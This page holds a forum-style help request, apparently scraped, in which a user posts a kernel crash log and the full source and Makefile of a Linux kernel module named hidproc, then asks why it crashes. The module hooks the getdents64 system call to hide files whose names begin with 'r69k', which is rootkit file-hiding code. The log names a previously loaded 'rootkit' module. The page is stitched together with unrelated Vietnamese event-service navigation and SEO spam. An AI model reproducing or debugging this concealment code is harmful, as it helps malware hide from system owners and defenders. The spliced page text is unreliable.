Jun 21 08:05:43 xubun2204 kernel: [ 1417.141512] RDX: 0000000000008000 RSI: 00003c34012dc030 RDI: ffff8d5ec33d0000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141513] RBP: ffffa559451ffd30 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141514] R10: 0000000000000246 R11: ffff8d5f35e78760 R12: ffff8d5ec33c8000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141516] R13: 0000000000008000 R14: 00000000000000c8 R15: 00000000000000c8
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141517] FS:  00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141519] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141520] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141534] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141535] Call Trace:
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141537]  <TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141538]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141542]  ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141546]  ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141550]  ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141554]  ? show_regs.part.0+0x23/0x29
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141555]  ? __die_body.cold+0x8/0xd
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141557]  ? __die+0x2b/0x37
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141559]  ? page_fault_oops+0x13b/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141563]  ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141566]  ? exc_page_fault+0x77/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141569]  ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141574]  ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141576]  ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141580]  __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141582]  trampoline_handler+0x41/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141585]  __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141587] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141589] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141590] RSP: 451fff48:ffffa559451ffe38 EFLAGS: 00000246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141592] RAX: 00000000000000c8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141593] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8983a900
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141594] RBP: ffffa559451ffe38 R08: ffff8d5e152a0800 R09: ffff8d5e8c596628
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141596] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa559451fff58
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141600]  ? do_syscall_64+0x56/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141603]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141605]  ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141608]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141610]  ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141612]  ? x64_sys_call+0x1a81/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141614]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141615]  ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141617]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141619]  ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141622]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141624]  ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141626]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141628]  ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141629]  ? x64_sys_call+0x1a55/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141631]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141633]  ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141635]  ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141637]  ? x64_sys_call+0x1022/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141639]  ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141640]  ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141643]  ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141646]  </TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141648] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141704] CR2: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141706] ---[ end trace ed478a6b988e964d ]---
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141707] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141709] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141711] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141713] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141714] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141715] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141716] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141718] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141719] FS:  00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141720] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141722] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141733] PKRU: 55555554

The kernel code that gives me the above crash is the following,

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<code>#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/unistd.h>
#include <linux/slab.h>
#include <linux/syscalls.h>
#include <linux/ptrace.h>
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <asm/syscall.h>
#include <asm/ptrace.h>
#include <linux/sched.h>
#include <linux/dcache.h>
#include <linux/path.h>
#include <linux/kstrtox.h>
#include <linux/binfmts.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
struct linux_dirent
{
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[];
};
struct linux_dirent64
{
uint64_t d_ino;
int64_t d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[];
};
#define ROOTKIT_PATTERN "rk_"
#define ROOTKIT_PATTERN_LEN 4
#define GETDENTS_COUNT_UNINIT 9999888221
#define GETDENTS_FD_UNINIT -1
spinlock_t spinlock_getdents64;
int g_fd;
struct linux_dirent64 *g_dirp = NULL;
unsigned long g_count = GETDENTS_COUNT_UNINIT;
unsigned long g_is_procfs = 0;
// getdents64 kretprobe
static int handler_entry_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
#if IS_ENABLED(CONFIG_X86_64)
int fd = ((struct pt_regs*)regs->di)->di;
void *dirv = (void *)((struct pt_regs*)regs->di)->si;
struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
unsigned long count = ((struct pt_regs*)regs->di)->dx;
#elif IS_ENABLED(CONFIG_ARM64)
int fd = ((struct pt_regs*)regs->regs[0])->regs[0];
void *dirv = (void *)((struct pt_regs*)regs->regs[0])->regs[1];
struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
unsigned long count = ((struct pt_regs*)regs->regs[0])->regs[2];
#endif
spin_lock(&spinlock_getdents64);
g_dirp = dirp;
g_count = count;
g_fd = fd;
spin_unlock(&spinlock_getdents64);
return 0;
}
static int handler_ret_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
int ret;
long retval;
long length;
char* kdirp_buf = NULL;
// Local copy of global variables
int l_fd;
unsigned long l_count;
struct linux_dirent64 *l_dirp;
struct inode *d_inode;
spin_lock(&spinlock_getdents64);
l_fd = g_fd;
l_count = g_count;
l_dirp = g_dirp;
spin_unlock(&spinlock_getdents64);
if ((l_dirp == NULL) || (l_count == GETDENTS_COUNT_UNINIT))
{
printk("[handler_ret]ttINITIALIZATION FAILEDn");
return 0;
}
retval = regs_return_value(regs);
#if IS_ENABLED(CONFIG_X86_64)
length = l_count;
#elif IS_ENABLED(CONFIG_ARM64)
length = retval;
#endif
kdirp_buf = kzalloc(length, GFP_KERNEL);
if (kdirp_buf == NULL)
{
printk("ERR kmalloc() failed!n");
return 0;
}
ret = copy_from_user(kdirp_buf, l_dirp, length);
if (ret != 0)
{
// printk("ERR copy_from_user() failed %d!n", ret);
kfree(kdirp_buf);
return 0;
}
if (retval <= 0)
{
kfree(kdirp_buf);
return retval;
}
if (retval != 0)
{
unsigned long offset = 0;
struct linux_dirent64 *d = NULL;
struct linux_dirent64 *prev_d = NULL;
unsigned short proc = 0;
#if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0)
d_inode = current->files->fdt->fd[l_fd]->f_dentry->d_inode;
#else
d_inode = current->files->fdt->fd[l_fd]->f_path.dentry->d_inode;
#endif
if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev))
{
proc = 1;
}
while (offset <= length)
// while (offset < retval)
{
d = (struct linux_dirent64 *)(kdirp_buf + offset);
if (!d || offset + d->d_reclen > retval || d->d_reclen == 0)
{
break;
}
if ((proc == 0) && ((d->d_name[0] == 114) && (d->d_name[1] == 54) && (d->d_name[2] == 57) && (d->d_name[3] == 107)))
{
if (d == (struct linux_dirent64 *)kdirp_buf)
{
retval -= d->d_reclen;
memmove(d, (void *)d + d->d_reclen, retval);
continue;
}
prev_d->d_reclen += d->d_reclen;
}
else
{
prev_d = d;
}
offset += d->d_reclen;
}
///
ret = copy_to_user(l_dirp, kdirp_buf, length);
regs_set_return_value(regs, retval);
}
kfree(kdirp_buf);
return 0;
}
static struct kretprobe kretGetdents64 =
{
.handler = handler_ret_getdents64,
.entry_handler = handler_entry_getdents64,
.kp.symbol_name = "__x64_sys_getdents64",
};
static int __init kretprobe_init(void)
{
int ret;
spin_lock_init(&spinlock_getdents64);
ret = register_kretprobe(&kretGetdents64);
if (ret < 0)
{
printk("Failed registering kretprobe getdents64 %d!n", ret);
return ret;
}
return 0;
}
static void __exit kretprobe_exit(void)
{
unregister_kretprobe(&kretGetdents64);
printk("Unregistering kretprobe getdents64n");
}
module_init(kretprobe_init)
module_exit(kretprobe_exit)
MODULE_LICENSE("GPL");
</code>
<code>#include <linux/module.h> #include <linux/kernel.h> #include <linux/kprobes.h> #include <linux/unistd.h> #include <linux/slab.h> #include <linux/syscalls.h> #include <linux/ptrace.h> #include <linux/fs.h> #include <linux/fdtable.h> #include <asm/syscall.h> #include <asm/ptrace.h> #include <linux/sched.h> #include <linux/dcache.h> #include <linux/path.h> #include <linux/kstrtox.h> #include <linux/binfmts.h> #include <linux/version.h> #include <linux/proc_ns.h> struct linux_dirent { unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[]; }; struct linux_dirent64 { uint64_t d_ino; int64_t d_off; unsigned short d_reclen; unsigned char d_type; char d_name[]; }; #define ROOTKIT_PATTERN "rk_" #define ROOTKIT_PATTERN_LEN 4 #define GETDENTS_COUNT_UNINIT 9999888221 #define GETDENTS_FD_UNINIT -1 spinlock_t spinlock_getdents64; int g_fd; struct linux_dirent64 *g_dirp = NULL; unsigned long g_count = GETDENTS_COUNT_UNINIT; unsigned long g_is_procfs = 0; // getdents64 kretprobe static int handler_entry_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs) { #if IS_ENABLED(CONFIG_X86_64) int fd = ((struct pt_regs*)regs->di)->di; void *dirv = (void *)((struct pt_regs*)regs->di)->si; struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv; unsigned long count = ((struct pt_regs*)regs->di)->dx; #elif IS_ENABLED(CONFIG_ARM64) int fd = ((struct pt_regs*)regs->regs[0])->regs[0]; void *dirv = (void *)((struct pt_regs*)regs->regs[0])->regs[1]; struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv; unsigned long count = ((struct pt_regs*)regs->regs[0])->regs[2]; #endif spin_lock(&spinlock_getdents64); g_dirp = dirp; g_count = count; g_fd = fd; spin_unlock(&spinlock_getdents64); return 0; } static int handler_ret_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs) { int ret; long retval; long length; char* kdirp_buf = NULL; // Local copy of global variables int l_fd; unsigned long l_count; struct linux_dirent64 *l_dirp; struct inode *d_inode; spin_lock(&spinlock_getdents64); l_fd = g_fd; l_count = g_count; l_dirp = g_dirp; spin_unlock(&spinlock_getdents64); if ((l_dirp == NULL) || (l_count == GETDENTS_COUNT_UNINIT)) { printk("[handler_ret]ttINITIALIZATION FAILEDn"); return 0; } retval = regs_return_value(regs); #if IS_ENABLED(CONFIG_X86_64) length = l_count; #elif IS_ENABLED(CONFIG_ARM64) length = retval; #endif kdirp_buf = kzalloc(length, GFP_KERNEL); if (kdirp_buf == NULL) { printk("ERR kmalloc() failed!n"); return 0; } ret = copy_from_user(kdirp_buf, l_dirp, length); if (ret != 0) { // printk("ERR copy_from_user() failed %d!n", ret); kfree(kdirp_buf); return 0; } if (retval <= 0) { kfree(kdirp_buf); return retval; } if (retval != 0) { unsigned long offset = 0; struct linux_dirent64 *d = NULL; struct linux_dirent64 *prev_d = NULL; unsigned short proc = 0; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[l_fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[l_fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev)) { proc = 1; } while (offset <= length) // while (offset < retval) { d = (struct linux_dirent64 *)(kdirp_buf + offset); if (!d || offset + d->d_reclen > retval || d->d_reclen == 0) { break; } if ((proc == 0) && ((d->d_name[0] == 114) && (d->d_name[1] == 54) && (d->d_name[2] == 57) && (d->d_name[3] == 107))) { if (d == (struct linux_dirent64 *)kdirp_buf) { retval -= d->d_reclen; memmove(d, (void *)d + d->d_reclen, retval); continue; } prev_d->d_reclen += d->d_reclen; } else { prev_d = d; } offset += d->d_reclen; } /// ret = copy_to_user(l_dirp, kdirp_buf, length); regs_set_return_value(regs, retval); } kfree(kdirp_buf); return 0; } static struct kretprobe kretGetdents64 = { .handler = handler_ret_getdents64, .entry_handler = handler_entry_getdents64, .kp.symbol_name = "__x64_sys_getdents64", }; static int __init kretprobe_init(void) { int ret; spin_lock_init(&spinlock_getdents64); ret = register_kretprobe(&kretGetdents64); if (ret < 0) { printk("Failed registering kretprobe getdents64 %d!n", ret); return ret; } return 0; } static void __exit kretprobe_exit(void) { unregister_kretprobe(&kretGetdents64); printk("Unregistering kretprobe getdents64n"); } module_init(kretprobe_init) module_exit(kretprobe_exit) MODULE_LICENSE("GPL"); </code>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/unistd.h>
#include <linux/slab.h>
#include <linux/syscalls.h>
#include <linux/ptrace.h>
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <asm/syscall.h>
#include <asm/ptrace.h>
#include <linux/sched.h>
#include <linux/dcache.h>
#include <linux/path.h>
#include <linux/kstrtox.h>
#include <linux/binfmts.h>
#include <linux/version.h>
#include <linux/proc_ns.h>

struct linux_dirent
{
    unsigned long   d_ino;
    unsigned long   d_off;
    unsigned short  d_reclen;
    char            d_name[];
};

struct linux_dirent64
{
    uint64_t        d_ino;
    int64_t         d_off;
    unsigned short  d_reclen;
    unsigned char   d_type;
    char            d_name[];
};




#define ROOTKIT_PATTERN                 "rk_"
#define ROOTKIT_PATTERN_LEN             4
#define GETDENTS_COUNT_UNINIT            9999888221
#define GETDENTS_FD_UNINIT               -1

spinlock_t spinlock_getdents64;

int g_fd;
struct linux_dirent64 *g_dirp = NULL;
unsigned long g_count = GETDENTS_COUNT_UNINIT;
unsigned long g_is_procfs = 0;

// getdents64 kretprobe
static int handler_entry_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
#if IS_ENABLED(CONFIG_X86_64)
    int fd = ((struct pt_regs*)regs->di)->di;
    void *dirv = (void *)((struct pt_regs*)regs->di)->si;
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
    unsigned long count = ((struct pt_regs*)regs->di)->dx;
#elif IS_ENABLED(CONFIG_ARM64)
    int fd = ((struct pt_regs*)regs->regs[0])->regs[0];
    void *dirv = (void *)((struct pt_regs*)regs->regs[0])->regs[1];
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
    unsigned long count = ((struct pt_regs*)regs->regs[0])->regs[2];
#endif

    spin_lock(&spinlock_getdents64);
    g_dirp = dirp;
    g_count = count;
    g_fd = fd;
    spin_unlock(&spinlock_getdents64);

    return 0;
}

static int handler_ret_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
    int ret;
    long retval;
    long length;
    char* kdirp_buf = NULL;

    // Local copy of global variables
    int l_fd;
    unsigned long l_count;
    struct linux_dirent64 *l_dirp;
    struct inode *d_inode;

    spin_lock(&spinlock_getdents64);
    l_fd = g_fd;
    l_count = g_count;
    l_dirp = g_dirp;
    spin_unlock(&spinlock_getdents64);

    if ((l_dirp == NULL) || (l_count == GETDENTS_COUNT_UNINIT))
    {
        printk("[handler_ret]ttINITIALIZATION FAILEDn");
        return 0;
    }

    retval = regs_return_value(regs);

#if IS_ENABLED(CONFIG_X86_64)
    length = l_count;
#elif IS_ENABLED(CONFIG_ARM64)
    length = retval;
#endif

    kdirp_buf = kzalloc(length, GFP_KERNEL);
    if (kdirp_buf == NULL)
    {
        printk("ERR kmalloc() failed!n");
        return 0;
    }

    ret = copy_from_user(kdirp_buf, l_dirp, length);
    if (ret != 0)
    {
        // printk("ERR copy_from_user() failed %d!n", ret);
        kfree(kdirp_buf);
        return 0;
    }

    if (retval <= 0)
    {
        kfree(kdirp_buf);
        return retval;
    }

    if (retval != 0)
    {
        unsigned long offset = 0;
        struct linux_dirent64 *d = NULL;
        struct linux_dirent64 *prev_d = NULL;
        unsigned short proc = 0;

#if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0)
        d_inode = current->files->fdt->fd[l_fd]->f_dentry->d_inode;
#else
        d_inode = current->files->fdt->fd[l_fd]->f_path.dentry->d_inode;
#endif

        if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev))
        {
            proc = 1;
        }

        while (offset <= length)
        // while (offset < retval)
        {
            d = (struct linux_dirent64 *)(kdirp_buf + offset);
            if (!d || offset + d->d_reclen > retval || d->d_reclen == 0) 
            {
                break;
            }

            if ((proc == 0) && ((d->d_name[0] == 114) && (d->d_name[1] == 54) && (d->d_name[2] == 57) && (d->d_name[3] == 107)))
            {
                if (d == (struct linux_dirent64 *)kdirp_buf)
                {
                    retval -= d->d_reclen;
                    memmove(d, (void *)d + d->d_reclen, retval);
                    continue;
                }

                prev_d->d_reclen += d->d_reclen;
            }
            else
            {
                prev_d = d;
            }
            offset += d->d_reclen;
        }
        ///
        ret = copy_to_user(l_dirp, kdirp_buf, length);
        regs_set_return_value(regs, retval);
    }

    kfree(kdirp_buf);

    return 0;
}

static struct kretprobe kretGetdents64 =
{
    .handler = handler_ret_getdents64,
    .entry_handler = handler_entry_getdents64,
    .kp.symbol_name = "__x64_sys_getdents64",
};

static int __init kretprobe_init(void)
{  
    int ret;
    spin_lock_init(&spinlock_getdents64);

    ret = register_kretprobe(&kretGetdents64);
    if (ret < 0)
    {
        printk("Failed registering kretprobe getdents64 %d!n", ret);
        return ret;
    }

    return 0;
}

static void __exit kretprobe_exit(void)
{
    unregister_kretprobe(&kretGetdents64);
    printk("Unregistering kretprobe getdents64n");
}

module_init(kretprobe_init)
module_exit(kretprobe_exit)
MODULE_LICENSE("GPL");

and the Makefile to compile the kernel module,

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<code>obj-m += hidproc.o
KBUILD_CFLAGS += -Wno-unused-function
CCFLAG-y := -O3 -flto -march=native -mtune=native -fomit-frame-pointer -funroll-loops -finline-functions
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
</code>
<code>obj-m += hidproc.o KBUILD_CFLAGS += -Wno-unused-function CCFLAG-y := -O3 -flto -march=native -mtune=native -fomit-frame-pointer -funroll-loops -finline-functions all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean </code>
obj-m += hidproc.o
KBUILD_CFLAGS += -Wno-unused-function
CCFLAG-y := -O3 -flto -march=native -mtune=native -fomit-frame-pointer -funroll-loops -finline-functions

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

I tried to narrow down the handler_ret_getdents64() code to see which part actually causes the crash and the following block seem to be the issue here, but it’s hard to say as I don’t have an easy way to reproduce the crash,

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<code> {
if (d == (struct linux_dirent64 *)kdirp_buf)
{
retval -= d->d_reclen;
memmove(d, (void *)d + d->d_reclen, retval);
continue;
}
prev_d->d_reclen += d->d_reclen;
}
</code>
<code> { if (d == (struct linux_dirent64 *)kdirp_buf) { retval -= d->d_reclen; memmove(d, (void *)d + d->d_reclen, retval); continue; } prev_d->d_reclen += d->d_reclen; } </code>
            {
                if (d == (struct linux_dirent64 *)kdirp_buf)
                {
                    retval -= d->d_reclen;
                    memmove(d, (void *)d + d->d_reclen, retval);
                    continue;
                }

                prev_d->d_reclen += d->d_reclen;
            }

The crash is usually happening when I start several applications at the same time, Firefox, VSCode, Thunderbird.
I have compared my code to existing open source projects and I could figure out what I’m doing wrong and what could cause the crash. I also added checks for NULL pointers everywhere(although all of them are not in the code now) but none of them really helped.

So I came here to ask for some expert opinion and help, I’m new in this field but I’m trying to learn as fast as I can. Please let me know what causes the above crash and how can I fix it?

Thanks,
Jelal

  • c
  • linux
  • linux-kernel
  • kernel
  • kprobe

Trang chủ Giới thiệu Sinh nhật bé trai Sinh nhật bé gái Tổ chức sự kiện Biểu diễn giải trí Dịch vụ khác Trang trí tiệc cưới Tổ chức khai trương Tư vấn dịch vụ Thư viện ảnh Tin tức - sự kiện Liên hệ Chú hề sinh nhật Trang trí YEAR END PARTY công ty Trang trí tất niên cuối năm Trang trí tất niên xu hướng mới nhất Trang trí sinh nhật bé trai Hải Đăng Trang trí sinh nhật bé Khánh Vân Trang trí sinh nhật Bích Ngân Trang trí sinh nhật bé Thanh Trang Thuê ông già Noel phát quà Biểu diễn xiếc khỉ Xiếc quay đĩa Dịch vụ tổ chức sự kiện 5 sao Thông tin về chúng tôi Dịch vụ sinh nhật bé trai Dịch vụ sinh nhật bé gái Sự kiện trọn gói Các tiết mục giải trí Dịch vụ bổ trợ Tiệc cưới sang trọng Dịch vụ khai trương Tư vấn tổ chức sự kiện Hình ảnh sự kiện Cập nhật tin tức Liên hệ ngay Thuê chú hề chuyên nghiệp Tiệc tất niên cho công ty Trang trí tiệc cuối năm Tiệc tất niên độc đáo Sinh nhật bé Hải Đăng Sinh nhật đáng yêu bé Khánh Vân Sinh nhật sang trọng Bích Ngân Tiệc sinh nhật bé Thanh Trang Dịch vụ ông già Noel Xiếc thú vui nhộn Biểu diễn xiếc quay đĩa Dịch vụ tổ chức tiệc uy tín Khám phá dịch vụ của chúng tôi Tiệc sinh nhật cho bé trai Trang trí tiệc cho bé gái Gói sự kiện chuyên nghiệp Chương trình giải trí hấp dẫn Dịch vụ hỗ trợ sự kiện Trang trí tiệc cưới đẹp Khởi đầu thành công với khai trương Chuyên gia tư vấn sự kiện Xem ảnh các sự kiện đẹp Tin mới về sự kiện Kết nối với đội ngũ chuyên gia Chú hề vui nhộn cho tiệc sinh nhật Ý tưởng tiệc cuối năm Tất niên độc đáo Trang trí tiệc hiện đại Tổ chức sinh nhật cho Hải Đăng Sinh nhật độc quyền Khánh Vân Phong cách tiệc Bích Ngân Trang trí tiệc bé Thanh Trang Thuê dịch vụ ông già Noel chuyên nghiệp Xem xiếc khỉ đặc sắc Xiếc quay đĩa thú vị

Filed under: Kiến thức lập trình - @ 14:32

Thẻ:

Trang chủ Giới thiệu Sinh nhật bé trai Sinh nhật bé gái Tổ chức sự kiện Biểu diễn giải trí Dịch vụ khác Trang trí tiệc cưới Tổ chức khai trương Tư vấn dịch vụ Thư viện ảnh Tin tức - sự kiện Liên hệ Chú hề sinh nhật Trang trí YEAR END PARTY công ty Trang trí tất niên cuối năm Trang trí tất niên xu hướng mới nhất Trang trí sinh nhật bé trai Hải Đăng Trang trí sinh nhật bé Khánh Vân Trang trí sinh nhật Bích Ngân Trang trí sinh nhật bé Thanh Trang Thuê ông già Noel phát quà Biểu diễn xiếc khỉ Xiếc quay đĩa
Thiết kế website Thiết kế website Thiết kế website Cách kháng tài khoản quảng cáo Mua bán Fanpage Facebook Dịch vụ SEO Tổ chức sinh nhật